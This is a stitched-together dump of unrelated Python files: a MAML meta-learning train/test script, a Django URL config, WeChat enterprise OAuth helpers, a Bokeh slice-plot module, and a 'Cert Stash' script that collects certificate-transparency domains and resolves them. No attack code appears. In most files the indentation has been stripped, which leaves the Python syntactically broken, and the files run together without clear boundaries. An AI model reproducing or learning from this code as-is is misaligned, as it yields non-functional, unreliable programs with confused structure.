def train(model, saver, sess, exp_string, data_generator, resume_itr=0):
SUMMARY_INTERVAL = 100
SAVE_INTERVAL = 1000
if FLAGS.datasource == 'sinusoid':
PRINT_INTERVAL = 1000
TEST_PRINT_INTERVAL = PRINT_INTERVAL*5
else:
PRINT_INTERVAL = 100
TEST_PRINT_INTERVAL = PRINT_INTERVAL*5
if FLAGS.log:
train_writer = tf.summary.FileWriter(FLAGS.logdir + '/' + exp_string, sess.graph)
print('Done initializing, starting training.')
prelosses, postlosses = [], []
num_classes = data_generator.num_classes # for classification, 1 otherwise
multitask_weights, reg_weights = [], []
for itr in range(resume_itr, FLAGS.pretrain_iterations + FLAGS.metatrain_iterations):
feed_dict = {}
if 'generate' in dir(data_generator):
batch_x, batch_y, amp, phase = data_generator.generate()
if FLAGS.baseline == 'oracle':
batch_x = np.concatenate([batch_x, np.zeros([batch_x.shape[0], batch_x.shape[1], 2])], 2)
for i in range(FLAGS.meta_batch_size):
batch_x[i, :, 1] = amp[i]
batch_x[i, :, 2] = phase[i]
inputa = batch_x[:, :num_classes*FLAGS.update_batch_size, :]
labela = batch_y[:, :num_classes*FLAGS.update_batch_size, :]
inputb = batch_x[:, num_classes*FLAGS.update_batch_size:, :] # b used for testing
labelb = batch_y[:, num_classes*FLAGS.update_batch_size:, :]
feed_dict = {model.inputa: inputa, model.inputb: inputb, model.labela: labela, model.labelb: labelb}
if itr < FLAGS.pretrain_iterations:
input_tensors = [model.pretrain_op]
else:
input_tensors = [model.metatrain_op]
if (itr % SUMMARY_INTERVAL == 0 or itr % PRINT_INTERVAL == 0):
input_tensors.extend([model.summ_op, model.total_loss1, model.total_losses2[FLAGS.num_updates-1]])
if model.classification:
input_tensors.extend([model.total_accuracy1, model.total_accuracies2[FLAGS.num_updates-1]])
result = sess.run(input_tensors, feed_dict)
if itr % SUMMARY_INTERVAL == 0:
prelosses.append(result[-2])
if FLAGS.log:
train_writer.add_summary(result[1], itr)
postlosses.append(result[-1])
if (itr!=0) and itr % PRINT_INTERVAL == 0:
if itr < FLAGS.pretrain_iterations:
print_str = 'Pretrain Iteration ' + str(itr)
else:
print_str = 'Iteration ' + str(itr - FLAGS.pretrain_iterations)
print_str += ': ' + str(np.mean(prelosses)) + ', ' + str(np.mean(postlosses))
print(print_str)
prelosses, postlosses = [], []
if (itr!=0) and itr % SAVE_INTERVAL == 0:
saver.save(sess, FLAGS.logdir + '/' + exp_string + '/model' + str(itr))
# sinusoid is infinite data, so no need to test on meta-validation set.
if (itr!=0) and itr % TEST_PRINT_INTERVAL == 0 and FLAGS.datasource !='sinusoid':
if 'generate' not in dir(data_generator):
feed_dict = {}
if model.classification:
input_tensors = [model.metaval_total_accuracy1, model.metaval_total_accuracies2[FLAGS.num_updates-1], model.summ_op]
else:
input_tensors = [model.metaval_total_loss1, model.metaval_total_losses2[FLAGS.num_updates-1], model.summ_op]
else:
batch_x, batch_y, amp, phase = data_generator.generate(train=False)
inputa = batch_x[:, :num_classes*FLAGS.update_batch_size, :]
inputb = batch_x[:, num_classes*FLAGS.update_batch_size:, :]
labela = batch_y[:, :num_classes*FLAGS.update_batch_size, :]
labelb = batch_y[:, num_classes*FLAGS.update_batch_size:, :]
feed_dict = {model.inputa: inputa, model.inputb: inputb, model.labela: labela, model.labelb: labelb, model.meta_lr: 0.0}
if model.classification:
input_tensors = [model.total_accuracy1, model.total_accuracies2[FLAGS.num_updates-1]]
else:
input_tensors = [model.total_loss1, model.total_losses2[FLAGS.num_updates-1]]
result = sess.run(input_tensors, feed_dict)
print('Validation results: ' + str(result[0]) + ', ' + str(result[1]))
saver.save(sess, FLAGS.logdir + '/' + exp_string + '/model' + str(itr))
# calculated for omniglot
NUM_TEST_POINTS = 600
def generate_test():
batch_size = 2
num_points = 101
# amp = np.array([3, 5])
# phase = np.array([0, 2.3])
amp = np.array([5, 3])
phase = np.array([2.3, 0])
outputs = np.zeros([batch_size, num_points, 1])
init_inputs = np.zeros([batch_size, num_points, 1])
for func in range(batch_size):
init_inputs[func, :, 0] = np.linspace(-5, 5, num_points)
outputs[func] = amp[func] * np.sin(init_inputs[func] - phase[func])
if FLAGS.baseline == 'oracle': # NOTE - this flag is specific to sinusoid
init_inputs = np.concatenate([init_inputs, np.zeros([init_inputs.shape[0], init_inputs.shape[1], 2])], 2)
for i in range(batch_size):
init_inputs[i, :, 1] = amp[i]
init_inputs[i, :, 2] = phase[i]
return init_inputs, outputs, amp, phase
def test_line_limit_Baye(model, sess, exp_string, mc_simulation=20, points_train=10, random_seed=1999):
inputs_all, outputs_all, amp_test, phase_test = generate_test()
np.random.seed(random_seed)
index = np.random.choice(inputs_all.shape[1], [inputs_all.shape[0], points_train], replace=False)
inputs_a = np.zeros([inputs_all.shape[0], points_train, inputs_all.shape[2]])
outputs_a = np.zeros([outputs_all.shape[0], points_train, outputs_all.shape[2]])
for line in range(len(index)):
inputs_a[line] = inputs_all[line, index[line], :]
outputs_a[line] = outputs_all[line, index[line], :]
feed_dict_line = {model.inputa: inputs_a, model.inputb: inputs_all, model.labela: outputs_a, model.labelb: outputs_all, model.meta_lr: 0.0}
mc_prediction = []
for mc_iter in range(mc_simulation):
predictions_all = sess.run(model.outputbs, feed_dict_line)
mc_prediction.append(np.array(predictions_all))
print("total mc simulation: ", mc_simulation)
print("shape of predictions_all is: ", predictions_all[0].shape)
prob_mean = np.nanmean(mc_prediction, axis=0)
prob_variance = np.var(mc_prediction, axis=0)
for line in range(len(inputs_all)):
plt.figure()
plt.plot(inputs_all[line, ..., 0].squeeze(), outputs_all[line, ..., 0].squeeze(), "r-", label="ground_truth")
# for update_step in range(len(predictions_all)):
for update_step in [0, len(predictions_all)-1]:
X = inputs_all[line, ..., 0].squeeze()
mu = prob_mean[update_step][line, ...].squeeze()
uncertainty = np.sqrt(prob_variance[update_step][line, ...].squeeze())
plt.plot(X, mu, "--", label="update_step_{:d}".format(update_step))
plt.fill_between(X, mu + uncertainty, mu - uncertainty, alpha=0.1)
plt.legend()
out_figure = FLAGS.logdir + '/' + exp_string + '/' + 'test_ubs' + str(
FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + 'line_{0:d}_numtrain_{1:d}_seed_{2:d}.png'.format(line, points_train, random_seed)
plt.plot(inputs_a[line, :, 0], outputs_a[line, :, 0], "b*", label="training points")
plt.savefig(out_figure, bbox_inches="tight", dpi=300)
plt.close()
def test_line_limit(model, sess, exp_string, num_train=10, random_seed=1999):
inputs_all, outputs_all, amp_test, phase_test = generate_test()
np.random.seed(random_seed)
index = np.random.choice(inputs_all.shape[1], [inputs_all.shape[0], num_train], replace=False)
inputs_a = np.zeros([inputs_all.shape[0], num_train, inputs_all.shape[2]])
outputs_a = np.zeros([outputs_all.shape[0], num_train, outputs_all.shape[2]])
for line in range(len(index)):
inputs_a[line] = inputs_all[line, index[line], :]
outputs_a[line] = outputs_all[line, index[line], :]
feed_dict_line = {model.inputa: inputs_a, model.inputb: inputs_all, model.labela: outputs_a, model.labelb: outputs_all, model.meta_lr: 0.0}
predictions_all = sess.run([model.outputas, model.outputbs], feed_dict_line)
print("shape of predictions_all is: ", predictions_all[0].shape)
for line in range(len(inputs_all)):
plt.figure()
plt.plot(inputs_all[line, ..., 0].squeeze(), outputs_all[line, ..., 0].squeeze(), "r-", label="ground_truth")
for update_step in range(len(predictions_all[1])):
plt.plot(inputs_all[line, ..., 0].squeeze(), predictions_all[1][update_step][line, ...].squeeze(), "--", label="update_step_{:d}".format(update_step))
plt.legend()
out_figure = FLAGS.logdir + '/' + exp_string + '/' + 'test_ubs' + str(
FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + 'line_{0:d}_numtrain_{1:d}_seed_{2:d}.png'.format(line, num_train, random_seed)
plt.plot(inputs_a[line, :, 0], outputs_a[line, :, 0], "b*", label="training points")
plt.savefig(out_figure, bbox_inches="tight", dpi=300)
plt.close()
def test_line(model, sess, exp_string):
inputs_all, outputs_all, amp_test, phase_test = generate_test()
feed_dict_line = {model.inputa: inputs_all, model.inputb: inputs_all, model.labela: outputs_all, model.labelb: outputs_all, model.meta_lr: 0.0}
predictions_all = sess.run([model.outputas, model.outputbs], feed_dict_line)
print("shape of predictions_all is: ", predictions_all[0].shape)
for line in range(len(inputs_all)):
plt.figure()
plt.plot(inputs_all[line, ..., 0].squeeze(), outputs_all[line, ..., 0].squeeze(), "r-", label="ground_truth")
for update_step in range(len(predictions_all[1])):
plt.plot(inputs_all[line, ..., 0].squeeze(), predictions_all[1][update_step][line, ...].squeeze(), "--", label="update_step_{:d}".format(update_step))
plt.legend()
out_figure = FLAGS.logdir + '/' + exp_string + '/' + 'test_ubs' + str(
FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + 'line_{0:d}.png'.format(line)
plt.savefig(out_figure, bbox_inches="tight", dpi=300)
plt.close()
# for line in range(len(inputs_all)):
# plt.figure()
# plt.plot(inputs_all[line, ..., 0].squeeze(), outputs_all[line, ..., 0].squeeze(), "r-", label="ground_truth")
#
# plt.plot(inputs_all[line, ..., 0].squeeze(), predictions_all[0][line, ...].squeeze(), "--",
# label="initial")
# plt.legend()
#
# out_figure = FLAGS.logdir + '/' + exp_string + '/' + 'test_ubs' + str(
# FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + 'init_line_{0:d}.png'.format(line)
#
# plt.savefig(out_figure, bbox_inches="tight", dpi=300)
# plt.close()
def test(model, saver, sess, exp_string, data_generator, test_num_updates=None):
num_classes = data_generator.num_classes # for classification, 1 otherwise
np.random.seed(1)
random.seed(1)
metaval_accuracies = []
for _ in range(NUM_TEST_POINTS):
if 'generate' not in dir(data_generator):
feed_dict = {}
feed_dict = {model.meta_lr : 0.0}
else:
batch_x, batch_y, amp, phase = data_generator.generate(train=False)
if FLAGS.baseline == 'oracle': # NOTE - this flag is specific to sinusoid
batch_x = np.concatenate([batch_x, np.zeros([batch_x.shape[0], batch_x.shape[1], 2])], 2)
batch_x[0, :, 1] = amp[0]
batch_x[0, :, 2] = phase[0]
inputa = batch_x[:, :num_classes*FLAGS.update_batch_size, :]
inputb = batch_x[:,num_classes*FLAGS.update_batch_size:, :]
labela = batch_y[:, :num_classes*FLAGS.update_batch_size, :]
labelb = batch_y[:,num_classes*FLAGS.update_batch_size:, :]
feed_dict = {model.inputa: inputa, model.inputb: inputb, model.labela: labela, model.labelb: labelb, model.meta_lr: 0.0}
if model.classification:
result = sess.run([model.metaval_total_accuracy1] + model.metaval_total_accuracies2, feed_dict)
else: # this is for sinusoid
result = sess.run([model.total_loss1] + model.total_losses2, feed_dict)
metaval_accuracies.append(result)
metaval_accuracies = np.array(metaval_accuracies)
means = np.mean(metaval_accuracies, 0)
stds = np.std(metaval_accuracies, 0)
ci95 = 1.96*stds/np.sqrt(NUM_TEST_POINTS)
print('Mean validation accuracy/loss, stddev, and confidence intervals')
print((means, stds, ci95))
out_filename = FLAGS.logdir +'/'+ exp_string + '/' + 'test_ubs' + str(FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + '.csv'
out_pkl = FLAGS.logdir +'/'+ exp_string + '/' + 'test_ubs' + str(FLAGS.update_batch_size) + '_stepsize' + str(FLAGS.update_lr) + '.pkl'
with open(out_pkl, 'wb') as f:
pickle.dump({'mses': metaval_accuracies}, f)
with open(out_filename, 'w') as f:
writer = csv.writer(f, delimiter=',')
writer.writerow(['update'+str(i) for i in range(len(means))])
writer.writerow(means)
writer.writerow(stds)
writer.writerow(ci95)
def main():
if FLAGS.datasource == 'sinusoid':
if FLAGS.train:
test_num_updates = 5
else:
test_num_updates = 10
else:
if FLAGS.datasource == 'miniimagenet':
if FLAGS.train == True:
test_num_updates = 1 # eval on at least one update during training
else:
test_num_updates = 10
else:
test_num_updates = 10
    if not FLAGS.train:
orig_meta_batch_size = FLAGS.meta_batch_size
# always use meta batch size of 1 when testing.
FLAGS.meta_batch_size = 1
if FLAGS.datasource == 'sinusoid':
data_generator = DataGenerator(FLAGS.update_batch_size*2, FLAGS.meta_batch_size)
else:
if FLAGS.metatrain_iterations == 0 and FLAGS.datasource == 'miniimagenet':
assert FLAGS.meta_batch_size == 1
assert FLAGS.update_batch_size == 1
data_generator = DataGenerator(1, FLAGS.meta_batch_size) # only use one datapoint,
else:
if FLAGS.datasource == 'miniimagenet': # TODO - use 15 val examples for imagenet?
if FLAGS.train:
data_generator = DataGenerator(FLAGS.update_batch_size+15, FLAGS.meta_batch_size) # only use one datapoint for testing to save memory
else:
data_generator = DataGenerator(FLAGS.update_batch_size*2, FLAGS.meta_batch_size) # only use one datapoint for testing to save memory
else:
data_generator = DataGenerator(FLAGS.update_batch_size*2, FLAGS.meta_batch_size) # only use one datapoint for testing to save memory
dim_output = data_generator.dim_output
if FLAGS.baseline == 'oracle':
assert FLAGS.datasource == 'sinusoid'
dim_input = 3
FLAGS.pretrain_iterations += FLAGS.metatrain_iterations
FLAGS.metatrain_iterations = 0
else:
dim_input = data_generator.dim_input
if FLAGS.datasource == 'miniimagenet' or FLAGS.datasource == 'omniglot':
tf_data_load = True
num_classes = data_generator.num_classes
if FLAGS.train: # only construct training model if needed
random.seed(5)
image_tensor, label_tensor = data_generator.make_data_tensor()
inputa = tf.slice(image_tensor, [0,0,0], [-1,num_classes*FLAGS.update_batch_size, -1])
inputb = tf.slice(image_tensor, [0,num_classes*FLAGS.update_batch_size, 0], [-1,-1,-1])
labela = tf.slice(label_tensor, [0,0,0], [-1,num_classes*FLAGS.update_batch_size, -1])
labelb = tf.slice(label_tensor, [0,num_classes*FLAGS.update_batch_size, 0], [-1,-1,-1])
input_tensors = {'inputa': inputa, 'inputb': inputb, 'labela': labela, 'labelb': labelb}
random.seed(6)
image_tensor, label_tensor = data_generator.make_data_tensor(train=False)
inputa = tf.slice(image_tensor, [0,0,0], [-1,num_classes*FLAGS.update_batch_size, -1])
inputb = tf.slice(image_tensor, [0,num_classes*FLAGS.update_batch_size, 0], [-1,-1,-1])
labela = tf.slice(label_tensor, [0,0,0], [-1,num_classes*FLAGS.update_batch_size, -1])
labelb = tf.slice(label_tensor, [0,num_classes*FLAGS.update_batch_size, 0], [-1,-1,-1])
metaval_input_tensors = {'inputa': inputa, 'inputb': inputb, 'labela': labela, 'labelb': labelb}
else:
tf_data_load = False
input_tensors = None
model = MAML(dim_input, dim_output, test_num_updates=test_num_updates)
if FLAGS.train or not tf_data_load:
model.construct_model(input_tensors=input_tensors, prefix='metatrain_')
if tf_data_load:
model.construct_model(input_tensors=metaval_input_tensors, prefix='metaval_')
model.summ_op = tf.summary.merge_all()
saver = loader = tf.train.Saver(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES), max_to_keep=10)
sess = tf.InteractiveSession()
    if not FLAGS.train:
# change to original meta batch size when loading model.
FLAGS.meta_batch_size = orig_meta_batch_size
if FLAGS.train_update_batch_size == -1:
FLAGS.train_update_batch_size = FLAGS.update_batch_size
if FLAGS.train_update_lr == -1:
FLAGS.train_update_lr = FLAGS.update_lr
exp_string = 'cls_'+str(FLAGS.num_classes)+'.mbs_'+str(FLAGS.meta_batch_size) + '.ubs_' + str(FLAGS.train_update_batch_size) + '.numstep' + str(FLAGS.num_updates) + '.updatelr' + str(FLAGS.train_update_lr)
if FLAGS.num_filters != 64:
exp_string += 'hidden' + str(FLAGS.num_filters)
if FLAGS.max_pool:
exp_string += 'maxpool'
if FLAGS.stop_grad:
exp_string += 'stopgrad'
if FLAGS.baseline:
exp_string += FLAGS.baseline
if FLAGS.norm == 'batch_norm':
exp_string += 'batchnorm'
elif FLAGS.norm == 'layer_norm':
exp_string += 'layernorm'
elif FLAGS.norm == 'None':
exp_string += 'nonorm'
else:
print('Norm setting not recognized.')
if FLAGS.pretrain_iterations != 0:
exp_string += '.pt' + str(FLAGS.pretrain_iterations)
if FLAGS.metatrain_iterations != 0:
exp_string += '.mt' + str(FLAGS.metatrain_iterations)
if FLAGS.keep_prob is not None:
exp_string += "kp{:.2f}".format(FLAGS.keep_prob)
if FLAGS.drop_connect is True:
exp_string += ".dropconn"
resume_itr = 0
model_file = None
tf.global_variables_initializer().run()
tf.train.start_queue_runners()
if FLAGS.resume or not FLAGS.train:
if exp_string == 'cls_5.mbs_25.ubs_10.numstep1.updatelr0.001nonorm.mt70000':
model_file = 'logs/sine//cls_5.mbs_25.ubs_10.numstep1.updatelr0.001nonorm.mt70000/model69999'
else:
model_file = tf.train.latest_checkpoint(FLAGS.logdir + '/' + exp_string)
# model_file = 'logs/sine//cls_5.mbs_25.ubs_10.numstep1.updatelr0.001nonorm.mt70000/model69999'
if FLAGS.test_iter > 0:
model_file = model_file[:model_file.index('model')] + 'model' + str(FLAGS.test_iter)
if model_file:
ind1 = model_file.index('model')
resume_itr = int(model_file[ind1+5:])
print("Restoring model weights from " + model_file)
saver.restore(sess, model_file)
if FLAGS.train:
train(model, saver, sess, exp_string, data_generator, resume_itr)
else:
# test_line(model, sess, exp_string)
# test_line_limit(model, sess, exp_string, num_train=2, random_seed=1999)
test_line_limit_Baye(model, sess, exp_string, mc_simulation=20, points_train=10, random_seed=1999)
# test(model, saver, sess, exp_string, data_generator, test_num_updates)
if __name__ == "__main__":
main()
# import matplotlib.pyplot as plt
# plt.plot(inputa.squeeze(), labela.squeeze(), "*")
# re = sess.run(model.result, feed_dict)
# plt.plot(inputa.squeeze(), re[0].squeeze(), "*")
# plt.savefig("/home/cougarnet.uh.edu/pyuan2/Projects2019/maml/Figures/maml/preda.png", bbox_inches="tight", dpi=300)
# for i in range(len(re[1])):
# plt.figure()
# plt.plot(inputb.squeeze(), labelb.squeeze(), "*")
# plt.plot(inputb.squeeze(), re[1][i].squeeze(), "*")
# plt.savefig("/home/cougarnet.uh.edu/pyuan2/Projects2019/maml/Figures/maml/predb_{:d}.png".format(i), bbox_inches="tight", dpi=300)
# plt.close()
# plt.figure()
# plt.imshow(metaval_accuracies)
# plt.savefig("/home/cougarnet.uh.edu/pyuan2/Projects2019/maml/Figures/maml/losses.png", bbox_inches="tight", dpi=300)
## Generate all sine
# def generate_test():
# amp_range = [0.1, 5.0]
# phase_range = [0, np.pi]
# batch_size = 100
# num_points = 101
# # amp = np.array([3, 5])
# # phase = np.array([0, 2.3])
# amp = np.random.uniform(amp_range[0], amp_range[1], [batch_size])
# phase = np.random.uniform(phase_range[0], phase_range[1], [batch_size])
# outputs = np.zeros([batch_size, num_points, 1])
# init_inputs = np.zeros([batch_size, num_points, 1])
# for func in range(batch_size):
# init_inputs[func, :, 0] = np.linspace(-5, 5, num_points)
# outputs[func] = amp[func] * np.sin(init_inputs[func] - phase[func])
# return init_inputs, outputs, amp, phase
# init_inputs, outputs, amp, phase = generate_test()
# plt.figure()
# for i in range(len(init_inputs)):
# plt.plot(init_inputs[i].squeeze(), outputs[i].squeeze())
|
StarcoderdataPython
|
102334
|
from __future__ import unicode_literals
from django.conf.urls.defaults import patterns, include, url
from django.conf import settings
urlpatterns = patterns('',
url(r'^$', 'xue.bandexams.views.my_view'),
url(r'add/$', 'xue.bandexams.views.add_view'),
)
# vim:ai:et:ts=4:sw=4:sts=4:fenc=utf8:
|
StarcoderdataPython
|
1706849
|
<gh_stars>1000+
try:
from urllib import quote_plus as quote
except ImportError:
from urllib.parse import quote_plus as quote
import time
from itchatmp.config import COMPANY_URL
from itchatmp.returnvalues import ReturnValue
from itchatmp.utils import retry, encode_send_dict
from ..requests import requests
from .common import access_token
# __server
def generate_code_url(redirectUri, state=None):
''' generate redirect url for visiting with code
* you don't need to urlencode redirectUri
'''
return ('https://open.weixin.qq.com/connect/oauth2/authorize?' +
'appid=%s&redirect_uri=%s&response_type=code&scope=snsapi_base' +
'&state=%s#wechat_redirect') % \
('__server.config.copId', quote(redirectUri), quote((state or str(int(time.time())))))
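# Illustrative call (the redirect URI and state below are made-up values, not part of this module):
#   generate_code_url('https://example.com/wx/callback', state='12345')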
@access_token
def get_user_info(code, accessToken=None):
params = {
'access_token': accessToken,
'code': code, }
r = requests.get('%s/cgi-bin/user/getuserinfo' % COMPANY_URL,
params=params).json()
if 'DeviceId' in r: r['errcode'] = 0
return ReturnValue(r)
@access_token
def user_id_open_id_switch(userId=None, openId=None, agentId=None, accessToken=None):
data = {}
if userId:
data['userid'] = userId
if agentId: data['agentid'] = agentId
url = '%s/cgi-bin/user/convert_to_openid?access_token=' + accessToken
elif openId:
data['openid'] = openId
url = '%s/cgi-bin/user/convert_to_userid?access_token=' + accessToken
data = encode_send_dict(data)
if data is None: return ReturnValue({'errcode': -10001})
r = requests.post(url % COMPANY_URL, data=data).json()
return ReturnValue(r)
@access_token
def get_login_info(code, accessToken=None):
data = {'auth_code': code, }
r = requests.post('%s/cgi-bin/service/get_login_info?access_token=%s' %
(COMPANY_URL, accessToken), data=data).json()
if 'usertype' in r: r['errcode'] = 0
return ReturnValue(r)
|
StarcoderdataPython
|
4811532
|
from bokeh.io import output_file
from bokeh.layouts import column, row
from bokeh.models import HoverTool
from bokeh.models.callbacks import CustomJS
from bokeh.models.widgets import Select
from bokeh.plotting import figure, ColumnDataSource, save
import json
import numpy as np
import sobol_seq
class Slice1D:
def __init__(self, plot, dim, x_grid, n_fpoint):
self.__plot = plot
self.x_grid = x_grid
self.dim = dim
self.size = n_fpoint
def data(self, i):
if i > self.size-1:
raise Exception('Trying to get non-exist data. Axis number should not exceed {}'.format(self.size - 1))
elif i < 0:
raise Exception('Cannot achieve plot data at negative index')
return self.__plot[i]
def to_json(self):
json_dict = {
'x_grid': self.x_grid.tolist(),
'size': self.size,
'dim': self.dim,
'entries': self.__plot
}
return json.dumps(json_dict)
def generate_sample_point(mn, mx, dim, n_fpoint, method='sobol'):
    # kept as a simple dispatch so other sampling methods can be added in the future
if method == 'sobol':
sobol_points = sobol_seq.i4_sobol_generate(dim, n_fpoint)
return np.interp(sobol_points, [0, 1], [mn, mx])
else:
pass
# sliceplorer(function_spec, n_focus_point), where function_spec expands to:
# f: the function supplied by the calling program
# mn, mx: lower and upper bounds of the computation range
# dim: number of dimensions of the function f
# the sampling method currently only supports Sobol sequences
def sliceplorer_core(f, mn, mx, dim: int, n_fpoint: int, n_seg: int=100, method='sobol'):
if mx <= mn:
raise Exception('Input min exceeds max value. (Error: min >= max)')
if n_fpoint <= 0:
raise Exception('Program requires at least 1 focus point.')
if dim < 1:
raise Exception('Sliceplorer does not support less than 1 dimension. (Error: dim < 1)')
if n_seg <= 0:
raise Exception('Number of linear space must be positive integer.')
sample_points = generate_sample_point(mn, mx, dim, n_fpoint, method=method)
f_vec = np.vectorize(f)
x = np.linspace(mn, mx, n_seg)
result = []
for point in sample_points:
data = []
for i in range(0, dim):
# create an argument list from point while having the i-th argument replaced
# with the array x, the array acts as free variable of our 1D slice
parg = []
parg += point[0:i].tolist()
parg.append(x)
parg += point[i + 1:].tolist()
v = f_vec(*parg)
data.append(v.tolist())
result.append({
'point': point.tolist(),
'data': data
})
return Slice1D(result, dim, x, n_fpoint)
def sliceplorer(f, mn, mx, dim, n_fpoint, output=None, n_seg=100, method='sobol', width=-1, height=-1, title=None):
calc_data = sliceplorer_core(f, mn, mx, dim, n_fpoint, n_seg, method)
source = []
for i in range(0, calc_data.size):
data = {
'x': calc_data.x_grid,
'fp': [calc_data.data(i)['point']] * len(calc_data.x_grid)
}
for j in range(0, calc_data.dim):
var_name = 'y' + str(j)
data[var_name] = calc_data.data(i)['data'][j]
source.append(ColumnDataSource(data=data))
tooltips = [
("(x,y)", "($x, $y)"),
("focus point", "@fp")
]
hover = HoverTool(tooltips=tooltips)
trace = [None] * calc_data.dim
for j in range(0, calc_data.size):
for i in range(0, calc_data.dim):
if not trace[i]:
if i == 0:
trace[i] = figure(
tools="wheel_zoom, pan",
title="x" + str(i + 1),
x_range=(mn, mx),
)
else:
trace[i] = figure(
tools="wheel_zoom, pan",
title="x" + str(i + 1),
x_range=trace[0].x_range,
y_range=trace[0].y_range
)
trace[i].add_tools(hover)
trace[i].line(
'x',
'y' + str(i),
source=source[j],
color="black",
alpha=0.1,
hover_color="firebrick",
hover_alpha=1,
name=str(i) + str(j)
)
data = {
'x': [],
'fp': []
}
for i in range(0, calc_data.dim):
var_name = 'y' + str(i)
data[var_name] = []
reset_source = ColumnDataSource(data=data)
hidden_source = ColumnDataSource(data=data)
for i in range(0, calc_data.dim):
trace[i].line(
'x',
'y' + str(i),
source=hidden_source,
color='firebrick',
alpha=1,
line_width=2
)
callback = CustomJS(args=dict(src=source, hsrc=hidden_source, resrc=reset_source), code="""
var sel_index = parseInt(cb_obj.value);
var data;
if (sel_index < 0)
data = resrc.data;
else
data = src[sel_index].data;
hsrc.data = data
""")
menu = [("-1", 'None')]
for i in range(0, calc_data.size):
menu.append((str(i), str(calc_data.data(i)['point'])))
select = Select(title="Select Focus Point:", value="-1", options=menu)
select.js_on_change('value', callback)
if width > 0:
for t in trace:
t.plot_width = width
if height > 0:
for t in trace:
t.plot_height = height
col = column(trace)
if output:
output_file(output)
save(row(col, select), title=title if title else 'Sliceplorer')
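

# --- Illustrative usage sketch (not part of the original module) ---
# The demo function, value range, and output file name below are assumptions chosen only
# to show how sliceplorer() is called; they are not defined anywhere else in this code.
if __name__ == "__main__":
    def demo_f(x, y):
        # simple 2D test function
        return np.sin(x) + 0.5 * np.cos(y)

    # 10 Sobol-sampled focus points over [-5, 5]^2, 1D slices written to an HTML file
    sliceplorer(demo_f, -5.0, 5.0, dim=2, n_fpoint=10,
                output="sliceplorer_demo.html", n_seg=100, title="Sliceplorer demo")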
|
StarcoderdataPython
|
3206330
|
DEFAULT_PORT = "0.0.0.0:6789"
|
StarcoderdataPython
|
115327
|
from app import logger, engine, parser
from app.utilities import export_db_to_excel, create_dataframe_from_sql, resolve_domains, export_to_excel, \
check_valid_domain_name
from app.get_certs import get_cert_ids_by_org, parse_domains_and_update_certsmasterdb, get_cert_by_domain_name
from app.filter import filter_domains
import sys
from app.globalvars import filename_prepend, input_file, input_phrase, input_domain_flag, input_org_flag, \
export_all_outfile, export_outfile, process, search_tag, internal_tld_file, external_tld_file, output_type
# if the task is to process domains stored in the sqlite database
if process is not None:
logger.debug('Created dataframe from the database\n')
dataframe = create_dataframe_from_sql(engine=engine, tablename='certsmaster')
if search_tag is not None:
logger.info('Detected tag :"{}"'.format(search_tag))
selected_dataframe = dataframe[dataframe['search_tag'].str.contains(r'\b{}\b'.format(search_tag))]
# once dataframe is selected with rows containing tag, send it as input to filter_domain to do filtering and
# get only external TLDs
if selected_dataframe.empty:
logger.warning('No records with the given search tag!!')
sys.exit('Exiting!')
else:
logger.info('Processing only selected data from backend database, based on "{}" tag\n'.format(search_tag))
logger.debug('Passing dataframe to filter_domains\n')
external_tld_df = filter_domains(internal_tld_file=internal_tld_file, external_tld_file=external_tld_file,
dataframe=selected_dataframe)
else: # original dataframe containing all rows goes for processing
# once dataframe is created from Sqlite database, send it as input to filter_domain to do filtering and get only
# external TLDs
logger.info('Processing all data from backend database\n')
logger.debug('Passing dataframe to filter_domains\n')
external_tld_df = filter_domains(internal_tld_file=internal_tld_file, external_tld_file=external_tld_file,
dataframe=dataframe)
logger.info('Proceeding to resolve IP address/ CNAME for external domain\n')
# Resolve the IP address and CNAME for each external domain filtered INPUT: External TLD dataframe
ns_dataframe = resolve_domains(external_tld_df)
logger.info('Exporting the DNS results to an excel {} - {}\n'.format(filename_prepend, 'NS_Results'))
export_to_excel(ns_dataframe, '{} - NS_Results'.format(filename_prepend))
# if the task is to update sqlite database with domain list or individual domain or export the contents of database
else: # The request is not to process but update databases from CRT.SH i.e. process arg not given
if input_domain_flag is not False:
# sys.exit('Not recommended, will be phased out soon! Sorry! \nExiting!!')
if input_file is not None:
logger.debug('Input file detected')
with open(input_file, 'r') as file:
logger.debug('Opened input file {}'.format(input_file))
i = 1
for item in file.readlines():
domain = item.rstrip()
logger.info('\n************************************************************\n'
'Processing client number {} : {}\n'
'************************************************************\n'.format(i, domain))
if check_valid_domain_name(domain):
get_cert_by_domain_name(domain=domain)
i += 1
if input_phrase is not None:
logger.debug('Input domain detected')
domain = input_phrase.rstrip()
logger.info('Processing {}\n'.format(domain))
if check_valid_domain_name(domain):
get_cert_by_domain_name(domain=domain)
if export_all_outfile is not False:
logger.debug('Export all option detected. Proceeding to export entire database into excel')
export_db_to_excel(engine=engine, tablename='certsmaster', outfile=export_all_outfile,
search_tag=search_tag)
if input_org_flag is not False:
if input_file is not None:
logger.debug('Input file detected')
with open(input_file, 'r') as file:
logger.debug('Opened input file {}'.format(input_file))
i = 1
for item in file.readlines():
org_name = item.rstrip()
logger.info('\n\n************************************************************\n'
'Processing client number {} : {}\n'
'************************************************************\n'.format(i, org_name))
certs_ref_df = get_cert_ids_by_org(org_name=org_name)
parse_domains_and_update_certsmasterdb(certs_ref_df=certs_ref_df, org_name=org_name)
i += 1
if input_phrase is not None:
logger.debug('Input domain detected')
org_name = input_phrase.rstrip()
logger.info('Processing {}\n'.format(org_name))
certs_ref_df = get_cert_ids_by_org(org_name=org_name) # Returns a dataframe of output
parse_domains_and_update_certsmasterdb(certs_ref_df=certs_ref_df, org_name=org_name)
if export_all_outfile is not False:
logger.debug(
'Export all option detected. Proceeding to export entire certsmaster table in database into excel')
export_db_to_excel(engine=engine, tablename='certsmaster', outfile=export_all_outfile,
search_tag=search_tag)
# i.e. if only -eA is given as option
if export_all_outfile is not False:
logger.debug('Export all option detected. Proceeding to export entire certsmaster table in database into excel')
export_db_to_excel(engine=engine, tablename='certsmaster', outfile=export_all_outfile)
# Print help if all arguments are none
if input_file is None and export_all_outfile is False and input_phrase is None:
logger.info('No arguments given. Printing default help\n')
    parser.print_help()  # prints help if no arguments were given to argparse
logger.info('Cert Stash has finished processing...')
logger.info('Done!\n')
|
StarcoderdataPython
|
16374
